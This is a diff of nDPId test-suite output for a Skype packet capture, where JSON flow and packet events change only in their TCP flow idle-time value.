00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6bg8AAEARKxbAqAEinTeCjDLdnEsAJgsKe3ECMurpMuGdyMUwflNlvhyptKR18dfr99Rpa+D7"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -541,22 +541,22 @@ 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1431970668278,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668278,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkhAAAEARZSnAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAux9AAEAGAGPAqAEib91Njsg7Abv27osgAAAAALAC\/\/8jHQAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAscJAAEAGp2XAqAEinTeCjsg8AbsAEWpXAAAAALAC\/\/\/YaAAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668515,"flow_last_seen":1431970668515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668515,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1431970668515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668515,"pkt":"0NQSxnP1PBXCt3IOCABFAABA27JAAEAGFFnAqAEinTfrqsg9AbvoZ1qDAAAAALAC\/\/+WyAAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668515,"flow_last_seen":1431970668515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668515,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1431970668515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668515,"pkt":"0NQSxnP1PBXCt3IOCABFAABAgztAAEAGbDrAqAEi1cezsMg+AbsskrryAAAAALAC\/\/\/xlwAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1431970668577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668577,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIgG7yD6AD\/E0LJK686ASOJCKGgAAAgQFrAQCCApO3n\/CPjIKcgEDAwk="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1431970668577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668577,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IFlAAEAGzyjAqAEi1cezsMg+AbsskrrzgA\/xNYAQECzhBgAAAQEICj4yCrBO3n\/C"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1431970668598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668598,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIgG7yD366YaT6GdahKASOJAv5wAAAgQFrAQCCApMVnF1PjIKcgEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1431970668598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668598,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0q7lAAEAGRF7AqAEinTfrqsg9AbvoZ1qE+umGlIAQECyGvgAAAQEICj4yCsVMVnF1"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1431970668642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668642,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiydN4KOwKgBIgG7yDxDIW5aABFqWKASOJD5UQAAAgQFrAQCCApOwLdCPjIKcgEDAwk="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1431970668642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668642,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ULBAAEAGCITAqAEinTeCjsg8AbsAEWpYQyFuW4AQECxP\/wAAAQEICj4yCu9OwLdC"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1431970668803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668803,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIgG7yDsQofTJ9u6LIaASOJCSWQAAAgQFrAQCCApNkBYwPjIKcgEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431970668803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668803,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qSRAAEAGEmrAqAEib91Njsg7Abv27oshEKH0yoAQECzoZgAAAQEICj4yC49NkBYw"} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAux9AAEAGAGPAqAEib91Njsg7Abv27osgAAAAALAC\/\/8jHQAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAscJAAEAGp2XAqAEinTeCjsg8AbsAEWpXAAAAALAC\/\/\/YaAAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668515,"flow_last_seen":1431970668515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668515,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1431970668515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668515,"pkt":"0NQSxnP1PBXCt3IOCABFAABA27JAAEAGFFnAqAEinTfrqsg9AbvoZ1qDAAAAALAC\/\/+WyAAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668515,"flow_last_seen":1431970668515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668515,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1431970668515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668515,"pkt":"0NQSxnP1PBXCt3IOCABFAABAgztAAEAGbDrAqAEi1cezsMg+AbsskrryAAAAALAC\/\/\/xlwAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1431970668577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668577,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIgG7yD6AD\/E0LJK686ASOJCKGgAAAgQFrAQCCApO3n\/CPjIKcgEDAwk="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1431970668577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668577,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IFlAAEAGzyjAqAEi1cezsMg+AbsskrrzgA\/xNYAQECzhBgAAAQEICj4yCrBO3n\/C"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1431970668598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668598,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIgG7yD366YaT6GdahKASOJAv5wAAAgQFrAQCCApMVnF1PjIKcgEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1431970668598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668598,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0q7lAAEAGRF7AqAEinTfrqsg9AbvoZ1qE+umGlIAQECyGvgAAAQEICj4yCsVMVnF1"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1431970668642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668642,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiydN4KOwKgBIgG7yDxDIW5aABFqWKASOJD5UQAAAgQFrAQCCApOwLdCPjIKcgEDAwk="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1431970668642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668642,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ULBAAEAGCITAqAEinTeCjsg8AbsAEWpYQyFuW4AQECxP\/wAAAQEICj4yCu9OwLdC"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1431970668803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668803,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIgG7yDsQofTJ9u6LIaASOJCSWQAAAgQFrAQCCApNkBYwPjIKcgEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431970668803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668803,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qSRAAEAGEmrAqAEib91Njsg7Abv27oshEKH0yoAQECzoZgAAAQEICj4yC49NkBYw"} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1LlEAAEARAb\/AqAEinTfrpjLdnE8AIZ69e3cC3u8ghDSSA4Gtev71JCe8ggQmBcfTOg=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -590,8 +590,8 @@ 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLhJoAAEARcpTAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLdIYAAEARgqjAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABArq9AAEAGEE\/AqAEib91KEshDnFkB\/oZbAAAAALAC\/\/94TQAAAgQFtAEDAwUBAQgKPjIXzQAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
